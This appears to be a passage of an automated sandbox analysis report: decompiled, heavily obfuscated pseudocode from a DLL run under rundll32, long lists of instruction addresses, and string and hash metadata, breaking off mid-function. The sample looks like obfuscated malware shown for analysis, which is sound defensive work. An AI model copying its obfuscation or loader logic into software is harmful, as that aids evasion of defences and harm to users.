										if(__eflags != 0) {
											__eflags = 1;
											do {
												_t881 = 0xf;
												_t1006 = ( *(_t1012 + 0x14c) & _t881) + 4;
												E100060DA(_t1012 + 0x14c,  *(_t1012 + 0xe8), 1, _t1006,  *(_t1012 + 0x13c),  *(_t1012 + 0x108),  *(_t1012 + 0xa4), _t998);
												_t1012 = _t1012 + 0x18;
												_t999 = _t998 + _t1006 * 2;
												_t883 = 0x2f;
												 *_t999 = _t883;
												_t998 = _t999 + 2;
												_t1010 = _t1010 - 1;
												__eflags = _t1010;
											} while (__eflags != 0);
											_t902 =  *((intOrPtr*)(_t1012 + 0x154));
											_t1002 =  *((intOrPtr*)(_t1012 + 0xc98));
										}
										_t1008 =  *((intOrPtr*)(_t1012 + 0x150));
										 *_t998 = 0;
										_t906 = 0x93c2f64;
										_t823 =  *((intOrPtr*)(_t1012 + 0x14));
										_t997 =  *((intOrPtr*)(_t1012 + 0xc90));
										continue;
									}
								}
							}
						} else {
							if(_t1016 == 0) {
								E100091CD( *(_t1012 + 0x6c),  *((intOrPtr*)(_t1012 + 0x44)),  *(_t1012 + 0x130),  *((intOrPtr*)(_t1012 + 0x170)),  *((intOrPtr*)(_t1012 + 0x70)));
								_t1012 = _t1012 + 0xc;
								_t906 = 0x1ac68c4;
								goto L10;
							} else {
								if(_t906 == 0x1ac68c4) {
									E100091CD( *(_t1012 + 0x3c),  *(_t1012 + 0x104),  *(_t1012 + 0x128),  *((intOrPtr*)(_t1012 + 0x15c)),  *(_t1012 + 0xb8));
									_t1012 = _t1012 + 0xc;
									_t906 = 0x3077984c;
									goto L10;
								} else {
									if(_t906 == 0x4136454) {
										E100091CD( *(_t1012 + 0xa4),  *(_t1012 + 0xfc),  *(_t1012 + 0x124),  *(_t1012 + 0x164),  *(_t1012 + 0x58));
										_t1012 = _t1012 + 0xc;
										_t906 = 0x12f44b45;
										goto L10;
									} else {
										if(_t906 == 0x599ba18) {
											_push(0x100014d4);
											_push( *(_t1012 + 0xc0));
											E100164EC(_t1012 + 0x214, __eflags, E1001BF25( *(_t1012 + 0x28),  *(_t1012 + 0x58), __eflags),  *(_t1012 + 0x98), 0x400, _t1012 + 0x2a0, _t1012 + 0x198,  *((intOrPtr*)(_t1012 + 0xa0)),  *(_t1012 + 0xec),  *(_t1012 + 0x110));
											E1001C5F7( *(_t1012 + 0x11c),  *((intOrPtr*)(_t1012 + 0x170)),  *(_t1012 + 0x58),  *(_t1012 + 0xfc), _t861);
											_t1012 = _t1012 + 0x34;
											_t906 = 0x2dee6d8e;
											L12:
											_t823 =  *((intOrPtr*)(_t1012 + 0x14));
											L13:
											_t1002 =  *((intOrPtr*)(_t1012 + 0xc98));
											continue;
										} else {
											_t1020 = _t906 - 0x93c2f64;
											if(_t906 != 0x93c2f64) {
												L44:
												__eflags = _t906 - 0x12d8e207;
												if(__eflags != 0) {
													continue;
													do {
														while(1) {
															_t1015 = _t906 - 0x1e362325;
															if(_t1015 > 0) {
																goto L30;
															}
															goto L2;
														}
														goto L30;
													} while (__eflags != 0);
													goto L45;
												} else {
													L45:
												}
											} else {
												E10005856(_t1012 + 0x208, _t997, _t1020);
												_t906 = 0x599ba18;
												L10:
												_t823 =  *((intOrPtr*)(_t1012 + 0x14));
												while(1) {
													_t1015 = _t906 - 0x1e362325;
													if(_t1015 > 0) {
														goto L30;
													}
													goto L2;
												}
											}
										}
									}
								}
							}
						}
					}
					L47:
					return _t1008;
					L30:
					__eflags = _t906 - 0x22fa333e;
					if(_t906 == 0x22fa333e) {
						E100091CD( *(_t1012 + 0xe0),  *((intOrPtr*)(_t1012 + 0x118)),  *(_t1012 + 0xd4), _t902,  *(_t1012 + 0x104));
						_t823 =  *((intOrPtr*)(_t1012 + 0x20));
						_t1012 = _t1012 + 0xc;
						_t906 = 0x12d8e207;
						goto L44;
					} else {
						__eflags = _t906 - 0x2a5de1a5;
						if(_t906 == 0x2a5de1a5) {
							 *(_t1012 + 0x14c) = E10017B6B();
							_t906 = 0x1e362325;
							goto L10;
						} else {
							__eflags = _t906 - 0x2dee6d8e;
							if(_t906 == 0x2dee6d8e) {
								E10011259(_t1012 + 0x15c, _t1012 + 0x20c, _t1012 + 0x16c);
								_pop(_t909);
								asm("sbb ecx, ecx");
								_t906 = (_t909 & 0x1a0814d6) + 0x1ac68c4;
								goto L10;
							} else {
								__eflags = _t906 - 0x2e4fe894;
								if(_t906 == 0x2e4fe894) {
									__eflags = E1000C07D( *((intOrPtr*)(_t1012 + 0xc98)), _t1012 + 0x164,  *(_t1012 + 0xf0),  *(_t1012 + 0x6c));
									_t906 = 0x4136454;
									_t831 = 1;
									_t1008 =  !=  ? _t831 : _t1008;
									 *((intOrPtr*)(_t1012 + 0x150)) = _t1008;
									goto L10;
								} else {
									__eflags = _t906 - 0x30070f42;
									if(_t906 == 0x30070f42) {
										 *((intOrPtr*)(_t1012 + 0x188)) = _t823;
										_t914 = _t1012 + 0x178;
										 *((intOrPtr*)(_t1012 + 0x180)) = _t1002;
										 *((intOrPtr*)(_t1012 + 0x18c)) = _t902;
										E1000A83A(_t914,  *((intOrPtr*)(_t1012 + 0xd0)),  *(_t1012 + 0x90), _t1012 + 0x180,  *(_t1012 + 0xb4));
										_t1012 = _t1012 + 0xc;
										asm("sbb ecx, ecx");
										_t906 = (_t914 & 0xf699bac2) + 0x22fa333e;
										goto L10;
									} else {
										__eflags = _t906 - 0x3077984c;
										if(_t906 == 0x3077984c) {
											E100091CD( *((intOrPtr*)(_t1012 + 0x70)),  *(_t1012 + 0xb8),  *(_t1012 + 0xec),  *(_t1012 + 0x178),  *(_t1012 + 0xdc));
											_t1012 = _t1012 + 0xc;
											_t906 = 0x22fa333e;
											goto L10;
										} else {
											__eflags = _t906 - 0x394a6f23;
											if(__eflags != 0) {
												goto L44;
											} else {
												_push(0x100014a4);
												_push( *(_t1012 + 0x90));
												E10003482( *(_t1012 + 0x6c), __eflags, ( *( *0x100221c0 + 0x18))[3] & 0x000000ff, _t1012 + 0x1b4,  *((intOrPtr*)(_t1012 + 0x170)),  *(_t1012 + 0x14c),  *( *( *0x100221c0 + 0x18)) & 0x000000ff, ( *( *0x100221c0 + 0x18))[2] & 0x000000ff, 0x40, ( *( *0x100221c0 + 0x18))[1] & 0x000000ff, E1001BF25( *(_t1012 + 0x13c),  *(_t1012 + 0x9c), __eflags),  *((intOrPtr*)(_t1012 + 0x44)),  *(_t1012 + 0xb0),  *(_t1012 + 0xa4));
												E1001C5F7( *((intOrPtr*)(_t1012 + 0xa0)),  *(_t1012 + 0x98),  *((intOrPtr*)(_t1012 + 0x16c)),  *(_t1012 + 0x88), _t867);
												_t1012 = _t1012 + 0x44;
												_t906 = 0x1bef9ca6;
												 *(_t1012 + 0x168) = ( *( *0x100221c0 + 0x18))[4] & 0x0000ffff;
												goto L12;
											}
										}
									}
								}
							}
						}
					}
					goto L47;
				}
			}












































                                                                        0x10019dd1
                                                                        0x10019dd8
                                                                        0x10019ddf
                                                                        0x10019de0
                                                                        0x10019de7
                                                                        0x10019de8
                                                                        0x10019de9
                                                                        0x10019dea
                                                                        0x10019def
                                                                        0x10019dfa
                                                                        0x10019e04
                                                                        0x10019e07
                                                                        0x10019e0e
                                                                        0x10019e13
                                                                        0x10019e1a
                                                                        0x10019e25
                                                                        0x10019e30
                                                                        0x10019e3b
                                                                        0x10019e46
                                                                        0x10019e4e
                                                                        0x10019e53
                                                                        0x10019e5b
                                                                        0x10019e63
                                                                        0x10019e6b
                                                                        0x10019e73
                                                                        0x10019e78
                                                                        0x10019e80
                                                                        0x10019e88
                                                                        0x10019e90
                                                                        0x10019e9b
                                                                        0x10019ea6
                                                                        0x10019eb1
                                                                        0x10019ebe
                                                                        0x10019ec2
                                                                        0x10019eca
                                                                        0x10019ed2
                                                                        0x10019eda
                                                                        0x10019ee5
                                                                        0x10019ef0
                                                                        0x10019ef7
                                                                        0x10019f02
                                                                        0x10019f0a
                                                                        0x10019f12
                                                                        0x10019f1a
                                                                        0x10019f22
                                                                        0x10019f2a
                                                                        0x10019f35
                                                                        0x10019f48
                                                                        0x10019f4f
                                                                        0x10019f5a
                                                                        0x10019f6d
                                                                        0x10019f74
                                                                        0x10019f7f
                                                                        0x10019f87
                                                                        0x10019f92
                                                                        0x10019f9d
                                                                        0x10019fa4
                                                                        0x10019faf
                                                                        0x10019fb7
                                                                        0x10019fbc
                                                                        0x10019fc4
                                                                        0x10019fcc
                                                                        0x10019fd4
                                                                        0x10019fdc
                                                                        0x10019fe1
                                                                        0x10019fe9
                                                                        0x10019ff1
                                                                        0x10019ff9
                                                                        0x1001a004
                                                                        0x1001a017
                                                                        0x1001a01e
                                                                        0x1001a029
                                                                        0x1001a036
                                                                        0x1001a041
                                                                        0x1001a049
                                                                        0x1001a054
                                                                        0x1001a05f
                                                                        0x1001a067
                                                                        0x1001a06f
                                                                        0x1001a07a
                                                                        0x1001a085
                                                                        0x1001a090
                                                                        0x1001a098
                                                                        0x1001a0a3
                                                                        0x1001a0b1
                                                                        0x1001a0b6
                                                                        0x1001a0bc
                                                                        0x1001a0c1
                                                                        0x1001a0c6
                                                                        0x1001a0ce
                                                                        0x1001a0d9
                                                                        0x1001a0e4
                                                                        0x1001a0ef
                                                                        0x1001a0fa
                                                                        0x1001a105
                                                                        0x1001a110
                                                                        0x1001a11b
                                                                        0x1001a126
                                                                        0x1001a131
                                                                        0x1001a13c
                                                                        0x1001a147
                                                                        0x1001a152
                                                                        0x1001a15d
                                                                        0x1001a168
                                                                        0x1001a174
                                                                        0x1001a179
                                                                        0x1001a17f
                                                                        0x1001a18c
                                                                        0x1001a18f
                                                                        0x1001a193
                                                                        0x1001a19b
                                                                        0x1001a1a3
                                                                        0x1001a1a8
                                                                        0x1001a1ad
                                                                        0x1001a1b5
                                                                        0x1001a1bd
                                                                        0x1001a1d3
                                                                        0x1001a1da
                                                                        0x1001a1e5
                                                                        0x1001a1f0
                                                                        0x1001a1f8
                                                                        0x1001a203
                                                                        0x1001a20b
                                                                        0x1001a213
                                                                        0x1001a21b
                                                                        0x1001a220
                                                                        0x1001a228
                                                                        0x1001a23b
                                                                        0x1001a23c
                                                                        0x1001a24b
                                                                        0x1001a252
                                                                        0x1001a25d
                                                                        0x1001a271
                                                                        0x1001a278
                                                                        0x1001a285
                                                                        0x1001a290
                                                                        0x1001a298
                                                                        0x1001a2a0
                                                                        0x1001a2a8
                                                                        0x1001a2ad
                                                                        0x1001a2b5
                                                                        0x1001a2bd
                                                                        0x1001a2cc
                                                                        0x1001a2cf
                                                                        0x1001a2d8
                                                                        0x1001a2dc
                                                                        0x1001a2e4
                                                                        0x1001a2ef
                                                                        0x1001a2f7
                                                                        0x1001a302
                                                                        0x1001a30f
                                                                        0x1001a313
                                                                        0x1001a318
                                                                        0x1001a320
                                                                        0x1001a328
                                                                        0x1001a33e
                                                                        0x1001a345
                                                                        0x1001a350
                                                                        0x1001a363
                                                                        0x1001a366
                                                                        0x1001a36d
                                                                        0x1001a378
                                                                        0x1001a383
                                                                        0x1001a38e
                                                                        0x1001a399
                                                                        0x1001a3a4
                                                                        0x1001a3ac
                                                                        0x1001a3b7
                                                                        0x1001a3c2
                                                                        0x1001a3ca
                                                                        0x1001a3da
                                                                        0x1001a3de
                                                                        0x1001a3e6
                                                                        0x1001a3ee
                                                                        0x1001a3f6
                                                                        0x1001a3fb
                                                                        0x1001a403
                                                                        0x1001a40b
                                                                        0x1001a413
                                                                        0x1001a425
                                                                        0x1001a428
                                                                        0x1001a42f
                                                                        0x1001a43a
                                                                        0x1001a445
                                                                        0x1001a452
                                                                        0x1001a456
                                                                        0x1001a45b
                                                                        0x1001a460
                                                                        0x1001a468
                                                                        0x1001a473
                                                                        0x1001a47e
                                                                        0x1001a486
                                                                        0x1001a491
                                                                        0x1001a49c
                                                                        0x1001a4a7
                                                                        0x1001a4b2
                                                                        0x1001a4bd
                                                                        0x1001a4c8
                                                                        0x1001a4d5
                                                                        0x1001a4e0
                                                                        0x1001a4e8
                                                                        0x1001a4f3
                                                                        0x1001a4fe
                                                                        0x1001a509
                                                                        0x1001a514
                                                                        0x1001a51c
                                                                        0x1001a52b
                                                                        0x1001a52e
                                                                        0x1001a53a
                                                                        0x1001a53e
                                                                        0x1001a546
                                                                        0x1001a551
                                                                        0x1001a560
                                                                        0x1001a565
                                                                        0x1001a56e
                                                                        0x1001a579
                                                                        0x1001a584
                                                                        0x1001a58f
                                                                        0x1001a59a
                                                                        0x1001a5a7
                                                                        0x1001a5a8
                                                                        0x1001a5ac
                                                                        0x1001a5b1
                                                                        0x1001a5b9
                                                                        0x1001a5c1
                                                                        0x1001a5cc
                                                                        0x1001a5d7
                                                                        0x1001a5e2
                                                                        0x1001a5ed
                                                                        0x1001a5f8
                                                                        0x1001a600
                                                                        0x1001a60d
                                                                        0x1001a611
                                                                        0x1001a619
                                                                        0x1001a621
                                                                        0x1001a62c
                                                                        0x1001a637
                                                                        0x1001a642
                                                                        0x1001a64d
                                                                        0x1001a658
                                                                        0x1001a663
                                                                        0x1001a66e
                                                                        0x1001a676
                                                                        0x1001a681
                                                                        0x1001a689
                                                                        0x1001a696
                                                                        0x1001a69a
                                                                        0x1001a69f
                                                                        0x1001a6a7
                                                                        0x1001a6ba
                                                                        0x1001a6c1
                                                                        0x1001a6cc
                                                                        0x1001a6d7
                                                                        0x1001a6e2
                                                                        0x1001a6ea
                                                                        0x1001a6f5
                                                                        0x1001a708
                                                                        0x1001a70f
                                                                        0x1001a71a
                                                                        0x1001a728
                                                                        0x1001a734
                                                                        0x1001a739
                                                                        0x1001a73f
                                                                        0x1001a747
                                                                        0x1001a74f
                                                                        0x1001a757
                                                                        0x1001a75f
                                                                        0x1001a764
                                                                        0x1001a769
                                                                        0x1001a771
                                                                        0x1001a77d
                                                                        0x1001a782
                                                                        0x1001a78c
                                                                        0x1001a791
                                                                        0x1001a79b
                                                                        0x1001a7a0
                                                                        0x1001a7a6
                                                                        0x1001a7ae
                                                                        0x1001a7b9
                                                                        0x1001a7c4
                                                                        0x1001a7cf
                                                                        0x1001a7db
                                                                        0x1001a7e0
                                                                        0x1001a7eb
                                                                        0x1001a7ee
                                                                        0x1001a7f2
                                                                        0x1001a7fa
                                                                        0x1001a802
                                                                        0x1001a80a
                                                                        0x1001a80f
                                                                        0x1001a817
                                                                        0x1001a81c
                                                                        0x1001a824
                                                                        0x1001a83a
                                                                        0x1001a841
                                                                        0x1001a84c
                                                                        0x1001a857
                                                                        0x1001a862
                                                                        0x1001a86d
                                                                        0x1001a880
                                                                        0x1001a881
                                                                        0x1001a888
                                                                        0x1001a893
                                                                        0x1001a89e
                                                                        0x1001a8a6
                                                                        0x1001a8b3
                                                                        0x1001a8b7
                                                                        0x1001a8bc
                                                                        0x1001a8c4
                                                                        0x1001a8d8
                                                                        0x1001a8eb
                                                                        0x1001a8ec
                                                                        0x1001a8f3
                                                                        0x1001a8fe
                                                                        0x1001a909
                                                                        0x1001a911
                                                                        0x1001a91c
                                                                        0x1001a927
                                                                        0x1001a92f
                                                                        0x1001a93a
                                                                        0x1001a945
                                                                        0x1001a94d
                                                                        0x1001a958
                                                                        0x1001a963
                                                                        0x1001a96e
                                                                        0x1001a979
                                                                        0x1001a984
                                                                        0x1001a98f
                                                                        0x1001a997
                                                                        0x1001a99f
                                                                        0x1001a9aa
                                                                        0x1001a9b5
                                                                        0x1001a9bd
                                                                        0x1001a9c8
                                                                        0x1001a9dc
                                                                        0x1001a9e3
                                                                        0x1001a9eb
                                                                        0x1001a9fd
                                                                        0x1001aa04
                                                                        0x1001aa08
                                                                        0x1001aa0f
                                                                        0x1001aa0f
                                                                        0x1001aa15
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001aa1b
                                                                        0x1001aa1b
                                                                        0x1001ad25
                                                                        0x1001ad2e
                                                                        0x1001ad42
                                                                        0x1001ad44
                                                                        0x1001ad4c
                                                                        0x1001ad4e
                                                                        0x1001ad6d
                                                                        0x1001ad72
                                                                        0x1001ad75
                                                                        0x1001ad79
                                                                        0x1001ad7b
                                                                        0x1001b009
                                                                        0x1001ad81
                                                                        0x1001ad81
                                                                        0x00000000
                                                                        0x1001ad81
                                                                        0x1001ad7b
                                                                        0x1001aa21
                                                                        0x1001aa21
                                                                        0x1001aa27
                                                                        0x1001ab9d
                                                                        0x1001aba3
                                                                        0x1001acee
                                                                        0x1001ad00
                                                                        0x1001ad05
                                                                        0x1001ad0a
                                                                        0x1001ad12
                                                                        0x00000000
                                                                        0x1001aba9
                                                                        0x1001aba9
                                                                        0x1001abaf
                                                                        0x1001ac60
                                                                        0x1001ac76
                                                                        0x1001acbb
                                                                        0x1001acc2
                                                                        0x1001acc7
                                                                        0x1001accc
                                                                        0x1001acd4
                                                                        0x00000000
                                                                        0x1001abb5
                                                                        0x1001abb5
                                                                        0x1001abbb
                                                                        0x00000000
                                                                        0x1001abc1
                                                                        0x1001abc8
                                                                        0x1001abd3
                                                                        0x1001abd8
                                                                        0x1001abd8
                                                                        0x1001abd9
                                                                        0x1001abdd
                                                                        0x1001abde
                                                                        0x1001abee
                                                                        0x1001ac00
                                                                        0x1001ac13
                                                                        0x1001ac18
                                                                        0x1001ac1b
                                                                        0x1001ac20
                                                                        0x1001ac21
                                                                        0x1001ac24
                                                                        0x1001ac27
                                                                        0x1001ac27
                                                                        0x1001ac27
                                                                        0x1001ac2a
                                                                        0x1001ac31
                                                                        0x1001ac31
                                                                        0x1001ac38
                                                                        0x1001ac41
                                                                        0x1001ac44
                                                                        0x1001ac49
                                                                        0x1001ac4d
                                                                        0x00000000
                                                                        0x1001ac4d
                                                                        0x1001abbb
                                                                        0x1001abaf
                                                                        0x1001aa2d
                                                                        0x1001aa2d
                                                                        0x1001ab8b
                                                                        0x1001ab90
                                                                        0x1001ab93
                                                                        0x00000000
                                                                        0x1001aa33
                                                                        0x1001aa39
                                                                        0x1001ab5f
                                                                        0x1001ab64
                                                                        0x1001ab67
                                                                        0x00000000
                                                                        0x1001aa3f
                                                                        0x1001aa45
                                                                        0x1001ab2d
                                                                        0x1001ab32
                                                                        0x1001ab35
                                                                        0x00000000
                                                                        0x1001aa4b
                                                                        0x1001aa51
                                                                        0x1001aa76
                                                                        0x1001aa7b
                                                                        0x1001aad1
                                                                        0x1001aaf0
                                                                        0x1001aaf5
                                                                        0x1001aaf8
                                                                        0x1001aafd
                                                                        0x1001aafd
                                                                        0x1001ab01
                                                                        0x1001ab01
                                                                        0x00000000
                                                                        0x1001aa53
                                                                        0x1001aa53
                                                                        0x1001aa59
                                                                        0x1001afe1
                                                                        0x1001afe1
                                                                        0x1001afe7
                                                                        0x00000000
                                                                        0x1001aa0f
                                                                        0x1001aa0f
                                                                        0x1001aa0f
                                                                        0x1001aa15
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001aa15
                                                                        0x00000000
                                                                        0x1001aa0f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001afed
                                                                        0x1001afed
                                                                        0x1001aa5f
                                                                        0x1001aa66
                                                                        0x1001aa6b
                                                                        0x1001aa70
                                                                        0x1001aa70
                                                                        0x1001aa0f
                                                                        0x1001aa0f
                                                                        0x1001aa15
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001aa15
                                                                        0x1001aa0f
                                                                        0x1001aa59
                                                                        0x1001aa51
                                                                        0x1001aa45
                                                                        0x1001aa39
                                                                        0x1001aa2d
                                                                        0x1001aa27
                                                                        0x1001b013
                                                                        0x1001b01d
                                                                        0x1001ad8b
                                                                        0x1001ad8b
                                                                        0x1001ad91
                                                                        0x1001afd0
                                                                        0x1001afd5
                                                                        0x1001afd9
                                                                        0x1001afdc
                                                                        0x00000000
                                                                        0x1001ad97
                                                                        0x1001ad97
                                                                        0x1001ad9d
                                                                        0x1001afa2
                                                                        0x1001afa9
                                                                        0x00000000
                                                                        0x1001ada3
                                                                        0x1001ada3
                                                                        0x1001ada9
                                                                        0x1001af74
                                                                        0x1001af7b
                                                                        0x1001af7c
                                                                        0x1001af84
                                                                        0x00000000
                                                                        0x1001adaf
                                                                        0x1001adaf
                                                                        0x1001adb5
                                                                        0x1001af45
                                                                        0x1001af47
                                                                        0x1001af4e
                                                                        0x1001af4f
                                                                        0x1001af52
                                                                        0x00000000
                                                                        0x1001adbb
                                                                        0x1001adbb
                                                                        0x1001adc1
                                                                        0x1001aed6
                                                                        0x1001aedd
                                                                        0x1001aeeb
                                                                        0x1001af01
                                                                        0x1001af08
                                                                        0x1001af0d
                                                                        0x1001af12
                                                                        0x1001af1a
                                                                        0x00000000
                                                                        0x1001adc7
                                                                        0x1001adc7
                                                                        0x1001adcd
                                                                        0x1001aebd
                                                                        0x1001aec2
                                                                        0x1001aec5
                                                                        0x00000000
                                                                        0x1001add3
                                                                        0x1001add3
                                                                        0x1001add9
                                                                        0x00000000
                                                                        0x1001addf
                                                                        0x1001addf
                                                                        0x1001ade4
                                                                        0x1001ae56
                                                                        0x1001ae78
                                                                        0x1001ae82
                                                                        0x1001ae85
                                                                        0x1001ae91
                                                                        0x00000000
                                                                        0x1001ae91
                                                                        0x1001add9
                                                                        0x1001adcd
                                                                        0x1001adc1
                                                                        0x1001adb5
                                                                        0x1001ada9
                                                                        0x1001ad9d
                                                                        0x00000000
                                                                        0x1001ad91

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: /$ $!"$"s$#oJ9$)?$.v$15$2b$8$;d$DM$De$H{$b-$d/<$d/<$dg$l8$m$}&$}G$}$%
                                                                        • API String ID: 0-2457962065
                                                                        • Opcode ID: b8df35f1196089bd07a24ea1b598622fca57a06b5ac65ee51d509657330a990c
                                                                        • Instruction ID: 976f8a73325060f499c1b6153de22724aa2fccf811286313bd7587404af29fef
                                                                        • Opcode Fuzzy Hash: b8df35f1196089bd07a24ea1b598622fca57a06b5ac65ee51d509657330a990c
                                                                        • Instruction Fuzzy Hash: 6292F2715093818FE378CF61C989B9BBBE1FBC5744F10891DE18A8A260D7B59989CF43
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10012965, Relevance: 26.8, Strings: 21, Instructions: 559COMMONCrypto
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 541 10012965-10013287 call 100145f8 544 1001328e 541->544 545 10013293-10013299 544->545 546 10013460-10013466 545->546 547 1001329f 545->547 548 100135fc-10013623 call 100091cd 546->548 549 1001346c-10013472 546->549 550 100132a5-100132ab 547->550 551 10013418-1001345b call 1000d0de 547->551 573 10013628-1001362e 548->573 553 100135c3-100135f7 call 10011b71 549->553 554 10013478-1001347a 549->554 555 100132b1-100132b7 550->555 556 10013636-10013648 550->556 551->545 553->544 560 10013480-10013486 554->560 561 1001353c-100135be call 1001bf25 call 100164ec call 1001c5f7 554->561 562 100133e9-10013413 call 100078f0 555->562 563 100132bd-100132c3 555->563 559 1001364e-10013658 556->559 567 10013513-10013537 call 100091cd 560->567 568 1001348c-10013492 560->568 561->544 562->544 569 100132c9-100132cf 563->569 570 100133bd-100133e4 call 100091cd 563->570 567->544 568->573 575 10013498-1001350e call 10009295 call 1001bbab call 1001c353 568->575 576 100132d5-100132db 569->576 577 1001335e-1001337a call 100157e8 569->577 570->544 573->545 581 10013634 573->581 599 10013353-10013359 575->599 586 10013327-1001334d call 10002628 576->586 587 100132dd-100132e3 576->587 577->559 596 10013380-100133b8 call 10001d54 577->596 581->559 586->599 587->573 593 100132e9-10013322 call 100189f6 587->593 593->544 596->544 599->544
                                                                        C-Code - Quality: 94%
                                                                        			E10012965(intOrPtr __ecx, signed int __edx) {
				char _v524;
				char _v1044;
				char _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				signed int _v1576;
				intOrPtr _v1580;
				char _v1584;
				intOrPtr _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				signed int _v1800;
				signed int _v1804;
				signed int _v1808;
				signed int _v1812;
				signed int _v1816;
				signed int _v1820;
				signed int _v1824;
				void* _t616;
				void* _t617;
				signed int _t631;
				signed int _t636;
				signed int _t638;
				signed int _t643;
				signed int _t653;
				signed int _t654;
				signed int _t655;
				signed int _t656;
				signed int _t657;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t661;
				signed int _t662;
				signed int _t663;
				signed int _t664;
				signed int _t665;
				signed int _t675;
				void* _t676;
				void* _t681;
				signed int _t731;
				signed int _t732;
				signed int _t733;
				signed int _t734;
				signed int _t737;
				void* _t739;
				void* _t740;
				void* _t742;

				_v1592 = __edx;
				_v1588 = __ecx;
				_v1600 = 0x81a2;
				_v1600 = _v1600 * 0x51;
				_t734 = 0x149dffe6;
				_v1600 = _v1600 ^ 0x0029046b;
				_v1820 = 0xa317;
				_t731 = 0x6d;
				_v1820 = _v1820 / _t731;
				_v1820 = _v1820 | 0xb0bf28c0;
				_v1820 = _v1820 << 8;
				_v1820 = _v1820 ^ 0xbf29f1c0;
				_v1644 = 0x87c;
				_v1644 = _v1644 << 4;
				_v1644 = _v1644 ^ 0x00008950;
				_v1656 = 0xaf72;
				_v1656 = _v1656 ^ 0xf8536856;
				_v1656 = _v1656 ^ 0xf853f78b;
				_v1720 = 0x2378;
				_t653 = 0x12;
				_v1720 = _v1720 * 0x77;
				_v1720 = _v1720 ^ 0x64312f2b;
				_v1720 = _v1720 ^ 0x642133c7;
				_v1804 = 0xea19;
				_v1804 = _v1804 + 0xffff5808;
				_v1804 = _v1804 << 0x10;
				_v1804 = _v1804 * 0x6f;
				_v1804 = _v1804 ^ 0xac4f53f6;
				_v1748 = 0x9778;
				_v1748 = _v1748 << 7;
				_v1748 = _v1748 ^ 0x598ba3f9;
				_v1748 = _v1748 + 0x8ff6;
				_v1748 = _v1748 ^ 0x59c0ab27;
				_v1664 = 0x881f;
				_v1664 = _v1664 >> 0xa;
				_v1664 = _v1664 | 0x5b999195;
				_v1664 = _v1664 ^ 0x5b999b93;
				_v1728 = 0x74b1;
				_v1728 = _v1728 ^ 0x6074f824;
				_v1728 = _v1728 >> 0xd;
				_v1728 = _v1728 ^ 0x00031884;
				_v1628 = 0x3039;
				_v1628 = _v1628 / _t653;
				_v1628 = _v1628 ^ 0x00006384;
				_v1736 = 0xc64f;
				_t654 = 0x5c;
				_v1736 = _v1736 / _t654;
				_v1736 = _v1736 | 0xd5a0b868;
				_v1736 = _v1736 ^ 0xd5a0f550;
				_v1724 = 0xb856;
				_v1724 = _v1724 + 0x47b5;
				_v1724 = _v1724 * 0x2a;
				_v1724 = _v1724 ^ 0x002a3a18;
				_v1824 = 0x8351;
				_v1824 = _v1824 + 0x81f5;
				_v1824 = _v1824 + 0xe517;
				_v1824 = _v1824 << 2;
				_v1824 = _v1824 ^ 0x0007a51f;
				_v1740 = 0xf66b;
				_v1740 = _v1740 + 0xffff1308;
				_v1740 = _v1740 << 6;
				_v1740 = _v1740 ^ 0x0002750a;
				_v1792 = 0x9fd9;
				_v1792 = _v1792 + 0x4b8e;
				_v1792 = _v1792 + 0xffff2f9e;
				_v1792 = _v1792 >> 0xf;
				_v1792 = _v1792 ^ 0x00003a08;
				_v1800 = 0x966c;
				_v1800 = _v1800 ^ 0x8d45c2e0;
				_v1800 = _v1800 ^ 0x65a85158;
				_v1800 = _v1800 + 0xffff603c;
				_v1800 = _v1800 ^ 0xe8ec61cf;
				_v1716 = 0x4029;
				_t655 = 0x60;
				_v1716 = _v1716 / _t655;
				_v1716 = _v1716 ^ 0x86a261cb;
				_v1716 = _v1716 ^ 0x86a2059f;
				_v1808 = 0xe8e3;
				_v1808 = _v1808 / _t731;
				_v1808 = _v1808 + 0x483f;
				_v1808 = _v1808 ^ 0xbcef0a4e;
				_v1808 = _v1808 ^ 0xbcef6349;
				_v1816 = 0x6f91;
				_v1816 = _v1816 + 0xffff8468;
				_t732 = 0x34;
				_t656 = 0x29;
				_v1816 = _v1816 * 0x33;
				_v1816 = _v1816 << 7;
				_v1816 = _v1816 ^ 0xfecd495c;
				_v1640 = 0xa61;
				_v1640 = _v1640 >> 0xd;
				_v1640 = _v1640 ^ 0x00004d64;
				_v1648 = 0x609b;
				_v1648 = _v1648 + 0xae34;
				_v1648 = _v1648 ^ 0x00012005;
				_v1616 = 0x313f;
